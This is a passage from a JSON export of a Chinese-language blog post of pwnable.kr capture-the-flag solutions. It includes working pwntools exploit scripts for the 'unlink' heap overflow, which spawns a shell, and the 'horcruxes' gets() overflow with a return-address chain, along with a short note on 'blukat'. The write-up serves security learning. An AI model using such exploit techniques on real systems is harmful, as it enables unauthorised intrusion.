\u51fd\u6570\u7684\u5730\u5740\uff0c\u540e\u9762\u4e24\u4e2a\u5730\u5740\u5219\u662f\u5728\u4e0a\u9762 main \u51fd\u6570 ebp \u7684\u4e24\u6b21\u8df3\u8f6c\u4e2d\u7528\u5230\u3002<\/p>\n<pre class=\"brush: python; title: ; notranslate\" title=\"\">from pwn import *\r\nimport re\r\n\r\ncontext.log_level = 'debug'\r\nconn = process('\/home\/unlink\/unlink')\r\nstack = conn.recvregex('here is stack address leak: 0x(&#x5B;a-f0-9]+)\\n').decode()\r\nstack_addr = int(re.search('here is stack address leak: 0x(&#x5B;a-f0-9]+)', stack).groups()&#x5B;0], 16)\r\nheap = conn.recvregex('here is heap address leak: 0x(&#x5B;a-f0-9]+)\\n').decode()\r\nheap_addr = int(re.search('here is heap address leak: 0x(&#x5B;a-f0-9]+)', heap).groups()&#x5B;0], 16)\r\nprint stack_addr, heap_addr\r\n\r\n\r\nconn.recvuntil('now that you have leaks, get shell!')\r\nd = 'A'*16\r\nd += p32(heap_addr + 0x28)\r\nd += p32(stack_addr - 0x1c)\r\nd += p32(0x80484eb)\r\nd += p32(heap_addr + 0x24)\r\nd += p32(heap_addr + 0x24)\r\nconn.sendline(d)\r\nconn.interactive()<\/pre>\n<h2>blukat<\/h2>\n<p>\u8111\u7b4b\u6025\u8f6c\u5f2f\u5f0f\u7684\u9898\u76ee\uff0c\u56e0\u4e3a blukat \u7528\u6237\u5df2\u7ecf\u8bbe\u7f6e\u5230 blukat_pwn \u7ec4\u91cc\u4e86\uff0cpassword \u6587\u4ef6\u4e00\u5f00\u59cb\u5c31\u6709\u8bfb\u53d6\u6743\u9650\uff0c\u53ea\u4e0d\u8fc7\u8f93\u51fa\u7684\u6587\u4ef6\u5185\u5bb9\u5f88\u6709\u8ff7\u60d1\u6027\u2026\u2026\u6240\u4ee5\u8bfb\u51fa\u6765\u7136\u540e\u8f93\u5165\u5c31\u597d\u4e86\uff0c\u4ee3\u7801\u8fd8\u6545\u610f\u7559\u4e86\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u7684\u5e4c\u5b50\u3002<\/p>\n<h2>horcruxes<\/h2>\n<p>\u4ee3\u7801\u521d\u59cb\u5316\u4e86\u4e00\u5806\u968f\u673a\u503c\u7136\u540e\u8981\u6c42\u8f93\u5165\u7684\u503c\u7b49\u4e8e\u5b83\u4eec\u7684\u603b\u548c\uff0c\u663e\u7136\u751f\u6210\u968f\u673a\u6570\u6ca1\u6f0f\u6d1e\u7684\u8bdd\u80af\u5b9a\u662f\u529e\u4e0d\u5230\u7684\u3002\u7136\u540e ropme \u51fd\u6570\u91cc\u6709\u4e00\u6bb5\u770b\u4f3c\u53ef\u4ee5\u5229\u7528\u7684\u4ee3\u7801\uff0c\u53ef\u4ee5\u6ea2\u51fa\u540e\u8986\u76d6\u51fd\u6570\u8fd4\u56de\u5730\u5740\u8df3\u8f6c\u5230\u7bad\u5934\u5904\u6267\u884c\u3002<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">else {\r\n    printf(&quot;How many EXP did you earned? : &quot;);\r\n    gets(s);   \/\/ char s&#x5B;100];\r\n    if ( atoi(s) == sum ) {\r\n=&gt;      fd = open(&quot;flag&quot;, 0);\r\n        s&#x5B;read(fd, s, 0x64u)] = 0;\r\n        puts(s);\r\n        close(fd);\r\n        exit(0);\r\n    }\r\n    puts(&quot;You'd better get more experience to kill Voldemort&quot;);\r\n}<\/pre>\n<p>\u4f46\u5b9e\u9645\u4e0a\u56e0\u4e3a <\/p>\n<pre>fd = open(\"flag\", 0);<\/pre>\n<p> \u6240\u5728\u5730\u5740\u662f 0x80a010b\uff0c\u5305\u542b\u7684 0a \u6b63\u597d\u662f\u6362\u884c\u7b26\u4f1a\u88ab gets \u622a\u65ad\u6240\u4ee5\u884c\u4e0d\u901a\u3002<br \/>\n\u6b63\u597d\u4ee3\u7801\u4e2d\u6709 A &#8211; G \u4e03\u4e2a\u51fd\u6570\u4f1a\u6253\u5370\u51fa\u5404\u4e2a\u968f\u673a\u6570\u7684\u503c\uff0c\u800c\u4e14\u5b83\u4eec\u7684\u51fd\u6570\u5730\u5740\u4e5f\u6ca1\u6709\u7279\u6b8a\u5b57\u7b26\uff0c\u6240\u4ee5\u53ef\u4ee5\u5206\u522b\u8fd4\u56de\u5230\u8fd9\u4e9b\u51fd\u6570\u91cc\uff0c\u7b97\u51fa sum \u540e\u8f93\u5165\u5373\u53ef\u3002<\/p>\n<pre class=\"brush: python; title: ; notranslate\" title=\"\"># -*- coding: utf-8 -*-\r\nfrom pwn import *\r\nimport re\r\n\r\ncontext.log_level = 'debug'\r\n#conn = process('\/home\/horcruxes\/horcruxes')\r\nconn = remote('127.0.0.1', 9032)\r\nconn.recvuntil('Select Menu:')\r\nconn.sendline('0')\r\nconn.recvuntil('How many EXP did you earned? :')\r\np = 'a'*120\r\np += p32(0x809fe4b)    # A \u7684\u51fd\u6570\u5730\u5740\r\np += p32(0x809fe6a)    # B\r\np += p32(0x809fe89)    # C\r\np += p32(0x809fea8)    # D\r\np += p32(0x809fec7)    # E\r\np += p32(0x809fee6)    # F\r\np += p32(0x809ff05)    # G\r\np += p32(0x809fffc)    # main() \u4e2d\u8c03\u7528 ropme() \u7684\u5730\u5740\uff0c\u56e0\u4e3a ropme \u7684\u5165\u53e3\u5730\u5740\u542b 0a\r\nconn.sendline(p)\r\n\r\ndata = conn.recv(1024)\r\ndata = conn.recv(1024)\r\ndata = conn.recv(1024, timeout=5.0)\r\nprint 'data:', data\r\nexp = re.findall('EXP \\+(-?\\d+)', data, re.S)\r\nprint 'exp:', exp\r\nsum = 0\r\nfor e in exp:\r\n    sum += int(e)\r\nprint 'sum=', sum &amp; 0xffffffff\r\nconn.interactive()<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Toddler&#8217;s Bottle leg \u5173\u952e\u5728\u4e8e pc \u7684\u8ba1\u7b97\u3002\u4e0d\u50cf x86 \u91cc pc \u603b\u662f\u6307\u5411&#8230; <\/p>\n<div class=\"read-more navbutton\"><a href=\"https:\/\/flandre-scarlet.moe\/blog\/1658\/\">\u9605\u8bfb\u66f4\u591a<i class=\"fa fa-angle-double-right\"><\/i><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[85],"tags":[192,191],"class_list":["post-1658","post","type-post","status-publish","format-standard","hentry","category-programs","tag-pwn","tag-pwnable-kr"],"_links":{"self":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts\/1658","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/comments?post=1658"}],"version-history":[{"count":15,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts\/1658\/revisions"}],"predecessor-version":[{"id":1674,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts\/1658\/revisions\/1674"}],"wp:attachment":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/media?parent=1658"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/categories?post=1658"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/tags?post=1658"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}